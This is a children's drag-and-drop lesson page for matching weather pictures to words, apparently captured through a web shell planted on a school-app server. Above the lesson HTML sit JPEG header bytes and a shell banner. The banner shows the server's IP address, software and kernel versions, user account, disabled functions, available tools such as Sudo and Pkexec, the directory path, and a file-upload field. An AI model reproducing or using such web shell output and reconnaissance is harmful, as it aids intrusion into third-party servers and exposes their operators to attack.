????JFIF??x?x????'
| Server IP : 79.136.114.73 / Your IP : 216.73.216.191 Web Server : Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.29 OpenSSL/1.0.1f System : Linux b8009 3.13.0-170-generic #220-Ubuntu SMP Thu May 9 12:40:49 UTC 2019 x86_64 User : www-data ( 33) PHP Version : 5.5.9-1ubuntu4.29 Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority, MySQL : ON | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /var/www/appsrv.astacus.se/apps/school/www_old7/Html/LevelE/Category3/ |
Upload File : |
<!doctype html>
<html>
<head>
<title>Match the weather by looking at the picture</title>
<script type="text/javascript" src="../../../js/allScriptsForLessonsHtml.js"></script>
<style type="text/css">
table
{
border: 0px solid;
}
</style>
<script>
function page_preLoad()
{
shared_setDeviceTypeLevelCategoryLastLesson(Level.E, Category.No3);
shared_set_tblMainiPadBodyWidthHeight('id_tblMainiPadBody', 'id_meta');
shared_setHeaderTable('id_tblHeader', shared_title_page, shared_getSubTitle(Level.E, Category.No3, '6b'), true, true);
shared_setFooterTable('id_tblFooter', true, true, false, true, true);
var ids_headings = ['id_td_heading2'];
var ids_boxes = ['id_dropBox_goodWeather', 'id_dropBox_thunderStorm', 'id_dropBox_hotWeather', 'id_dropBox_coolWeather', 'id_dropBox_rainingCool', 'id_dropBox_windyWeather'];
var ids_options = ['id_td_windy', 'id_td_rainingAndCool', 'id_td_hot', 'id_td_thunderStorm', 'id_td_cool', 'id_td_fairAndGood'];
var ids_spans = ['id_span_windy', 'id_span_rainingAndCool', 'id_span_hot', 'id_span_thunderStorm', 'id_span_cool', 'id_span_fairAndGood'];
var ids_All = ids_headings.concat(ids_boxes, ids_spans);
shared_adjust_fontSize_for_ids_all_devices(ids_All, 70);
shared_adjust_fontSize_for_ids_all_devices(ids_options, 70);
shared_init_dropBox_tds_with_drag_here(ids_boxes);
shared_init_dropping_spans(ids_spans);
}
function page_onLoad()
{
}
function btnPrevious_click()
{
window.location = 'LevelECat3Lesson06a.html';
}
function btnNext_click()
{
window.location = 'LevelECat3Lesson07.html';
}
function btnHome_click()
{
shared_btnHomeCategories_click('LevelE');
}
function DragDrop(id_dropBox, ids_array)
{
if (shared_isMovingElementIdInTheArraySetIsFilledTrue(id_dropBox, ids_array))
{
shared_setTextAndBackgroundColorToGreenAndIsMovedTrue(shared_currentDropingId, id_dropBox);
isAllInfosMovedShowClapsAnimation();
shared_set_currentDropingId_draggbleToFalse();
}
else
{
shared_resetCurrentDroppingPosition(id_dropBox);
}
}
function isAllInfosMovedShowClapsAnimation()
{
var ids_boxes = ['id_dropBox_goodWeather', 'id_dropBox_thunderStorm', 'id_dropBox_hotWeather', 'id_dropBox_coolWeather', 'id_dropBox_rainingCool', 'id_dropBox_windyWeather'];
shared_is_all_infos_filled_show_claps_animationWithIsFilled(ids_boxes);
}
</script>
</head>
<body onload="page_onLoad()">
<div id="shared_id_div_claps_image">
</div>
<table id="id_tblMainiPadBody" border="1" cellspacing="0" cellpadding="0">
<tr height="8%">
<td>
<div id="id_tblHeader"></div>
</td>
</tr>
<tr height="*" data-role="page"> <!-- for swiping left and right especially for Android device -->
<td>
<table width="100%" height="100%" border="1" cellspacing="0" cellpadding="0">
<tr>
<td>
<table width="100%" height="100%" border="0" cellspacing="0" cellpadding="2%">
<tr height="*">
<td>
<table width="100%" height="100%" border="1" cellspacing="0" cellpadding="0">
<tr height="5%">
<td style="border-bottom: none">
<table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0" style="border:none">
<tr>
<td id="id_td_heading2" class="shared_style_options_blue_24px_bold">Guess the weather by looking at the picutres:</td>
</tr>
</table>
</td>
</tr>
<tr>
<td align="center" style="border-top: none; border-bottom: none">
<table id="id_tblSection2" width="100%" height="100%" border="0" cellspacing="0" cellpadding="0">
<tr height="*">
<td width="65%" style="border-left: 0px">
<table width="100%" height="100%" border="1" cellspacing="0" cellpadding="0">
<tr>
<td width="50%" style="border-left: 0px; border-right: 0px">
<table width="100%" height="100%" border="0" cellspacing="2%" cellpadding="0" style="padding-top: 0.2%; padding-bottom: 0.2%">
<tr id="id_tr_goodWeather" height="16.6%"
ondragover="shared_highlight('id_dropBox_goodWeather'); shared_allowDrop_web(event)"
ondragleave="shared_un_highlight('id_dropBox_goodWeather')"
ondrop="DragDrop('id_dropBox_goodWeather', ['id_span_fairAndGood'])">
<td width="50%" align="center" valign="middle">
<img id="id_img_goodWeather" src="../../../img/LevelE/Category3/LevelECat3Lesson06/goodWeather.png" width="50%" alt="" draggable="false"/>
</td>
<td id="id_dropBox_goodWeather" class="shared_style_red_24px_bold" width="*" align="center">
</td>
</tr>
<tr id="id_tr_thunderStorm" height="16.6%"
ondragover="shared_highlight('id_dropBox_thunderStorm'); shared_allowDrop_web(event)"
ondragleave="shared_un_highlight('id_dropBox_thunderStorm')"
ondrop="DragDrop('id_dropBox_thunderStorm', ['id_span_thunderStorm'])">
<td width="50%" align="center" valign="middle">
<img id="id_img_thunderStorm" src="../../../img/LevelE/Category3/LevelECat3Lesson06/thunderStorm.png" width="60%" alt="" draggable="false"/>
</td>
<td id="id_dropBox_thunderStorm" class="shared_style_red_24px_bold" width="*" align="center">
</td>
</tr>
<tr id="id_tr_hotWeather" height="16.6%"
ondragover="shared_highlight('id_dropBox_hotWeather'); shared_allowDrop_web(event)"
ondragleave="shared_un_highlight('id_dropBox_hotWeather')"
ondrop="DragDrop('id_dropBox_hotWeather', ['id_span_hot'])">
<td width="50%" align="center" valign="middle">
<img id="id_img_hotWeather" src="../../../img/LevelE/Category3/LevelECat3Lesson06/hotWeather.png" width="40%" alt="" draggable="false"/>
</td>
<td id="id_dropBox_hotWeather" class="shared_style_red_24px_bold" width="*" align="center">
</td>
</tr>
<tr id="id_tr_coolWeather" height="16.6%"
ondragover="shared_highlight('id_dropBox_coolWeather'); shared_allowDrop_web(event)"
ondragleave="shared_un_highlight('id_dropBox_coolWeather')"
ondrop="DragDrop('id_dropBox_coolWeather', ['id_span_cool'])">
<td width="50%" align="center" valign="middle">
<img id="id_img_coolWeather" src="../../../img/LevelE/Category3/LevelECat3Lesson06/coolWeather.png" width="45%" alt="" draggable="false"/>
</td>
<td id="id_dropBox_coolWeather" class="shared_style_red_24px_bold" width="*" align="center">
</td>
</tr>
<tr id="id_tr_rainingAndCool" height="16.6%"
ondragover="shared_highlight('id_dropBox_rainingCool'); shared_allowDrop_web(event)"
ondragleave="shared_un_highlight('id_dropBox_rainingCool')"
ondrop="DragDrop('id_dropBox_rainingCool', ['id_span_rainingAndCool'])">
<td width="50%" align="center" valign="middle">
<img id="id_img_rainingCool" src="../../../img/LevelE/Category3/LevelECat3Lesson06/rainingCool.png" width="50%" alt="" draggable="false"/>
</td>
<td id="id_dropBox_rainingCool" class="shared_style_red_24px_bold" width="*" align="center">
</td>
</tr>
<tr id="id_tr_windyWeather" height="*"
ondragover="shared_highlight('id_dropBox_windyWeather'); shared_allowDrop_web(event)"
ondragleave="shared_un_highlight('id_dropBox_windyWeather')"
ondrop="DragDrop('id_dropBox_windyWeather', ['id_span_windy'])">
<td width="50%" align="center" valign="middle">
<img id="id_img_windyWeather" src="../../../img/LevelE/Category3/LevelECat3Lesson06/windyWeather.png" width="35%" alt="" draggable="false"/>
</td>
<td id="id_dropBox_windyWeather" class="shared_style_red_24px_bold" width="*" align="center">
</td>
</tr>
</table>
</td>
<td width="1%" style="border-left: 0px; border-right: 0px"> </td>
</tr>
</table>
</td>
<td width="*">
<table width="100%" height="100%" border="1" cellspacing="0" cellpadding="0">
<tr>
<td style="border-right: 0px">
<table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0">
<tr height="16.6%">
<td id="id_td_windy" align="center" class="shared_style_blue_24px_bold" draggable="true" ondragstart="shared_dragStartNew(event)">
<span id="id_span_windy">Windy</span>
</td>
</tr>
<tr height="16.6%">
<td id="id_td_rainingAndCool" align="center" class="shared_style_blue_24px_bold" draggable="true" ondragstart="shared_dragStartNew(event)">
<span id="id_span_rainingAndCool" class="cls_drag_textTakeShower">Raining and cool</span>
</td>
</tr>
<tr height="16.6%">
<td id="id_td_hot" align="center" class="shared_style_blue_24px_bold" draggable="true" ondragstart="shared_dragStartNew(event)">
<span id="id_span_hot">Hot</span>
</td>
</tr>
<tr height="16.6%">
<td id="id_td_thunderStorm" align="center" class="shared_style_blue_24px_bold" draggable="true" ondragstart="shared_dragStartNew(event)">
<span id="id_span_thunderStorm">ThunderStorm</span>
</td>
</tr>
<tr height="16.6%">
<td id="id_td_cool" align="center" class="shared_style_blue_24px_bold" draggable="true" ondragstart="shared_dragStartNew(event)">
<span id="id_span_cool">Cool</span>
</td>
</tr>
<tr height="*">
<td id="id_td_fairAndGood" align="center" class="shared_style_blue_24px_bold" draggable="true" ondragstart="shared_dragStartNew(event)">
<span id="id_span_fairAndGood">Fair and good</span>
</td>
</tr>
</table>
</td>
</tr>
</table>
</td>
</tr>
</table>
</td>
</tr>
</table>
</td>
</tr>
</table>
</td>
</tr>
</table>
</td>
</tr>
<tr height="8%">
<td>
<div id="id_tblFooter"></div>
</td>
</tr>
</table>
<script>
page_preLoad();
new webkit_draggable('id_span_windy', {handle : 'id_td_windy', revert : true, scroll : false, onStart : function(){shared_dragStartNew(event)}});
new webkit_draggable('id_span_rainingAndCool', {handle : 'id_td_rainingAndCool', revert : true, scroll : false, onStart : function(){shared_dragStartNew(event)}});
new webkit_draggable('id_span_hot', {handle : 'id_td_hot', revert : true, scroll : false, onStart : function(){shared_dragStartNew(event)}});
new webkit_draggable('id_span_thunderStorm', {handle : 'id_td_thunderStorm', revert : true, scroll : false, onStart : function(){shared_dragStartNew(event)}});
new webkit_draggable('id_span_cool', {handle : 'id_td_cool', revert : true, scroll : false, onStart : function(){shared_dragStartNew(event)}});
new webkit_draggable('id_span_fairAndGood', {handle : 'id_td_fairAndGood', revert : true, scroll : false, onStart : function(){shared_dragStartNew(event)}});
webkit_drop.add('id_tr_windyWeather', {onOver : function(){shared_highlight('id_dropBox_windyWeather')}, onOut : function(){shared_un_highlight('id_dropBox_windyWeather')}, onDrop : function(){DragDrop('id_dropBox_windyWeather', ['id_span_windy'])}});
webkit_drop.add('id_tr_rainingAndCool', {onOver : function(){shared_highlight('id_dropBox_rainingCool')}, onOut : function(){shared_un_highlight('id_dropBox_rainingCool')}, onDrop : function(){DragDrop('id_dropBox_rainingCool', ['id_span_rainingAndCool'])}});
webkit_drop.add('id_tr_hotWeather', {onOver : function(){shared_highlight('id_dropBox_hotWeather')}, onOut : function(){shared_un_highlight('id_dropBox_hotWeather')}, onDrop : function(){DragDrop('id_dropBox_hotWeather', ['id_span_hot'])}});
webkit_drop.add('id_tr_thunderStorm', {onOver : function(){shared_highlight('id_dropBox_thunderStorm')}, onOut : function(){shared_un_highlight('id_dropBox_thunderStorm')}, onDrop : function(){DragDrop('id_dropBox_thunderStorm', ['id_span_thunderStorm'])}});
webkit_drop.add('id_tr_coolWeather', {onOver : function(){shared_highlight('id_dropBox_coolWeather')}, onOut : function(){shared_un_highlight('id_dropBox_coolWeather')}, onDrop : function(){DragDrop('id_dropBox_coolWeather', ['id_span_cool'])}});
webkit_drop.add('id_tr_goodWeather', {onOver : function(){shared_highlight('id_dropBox_goodWeather')}, onOut : function(){shared_un_highlight('id_dropBox_goodWeather')}, onDrop : function(){DragDrop('id_dropBox_goodWeather', ['id_span_fairAndGood'])}});
</script>
</body>
</html>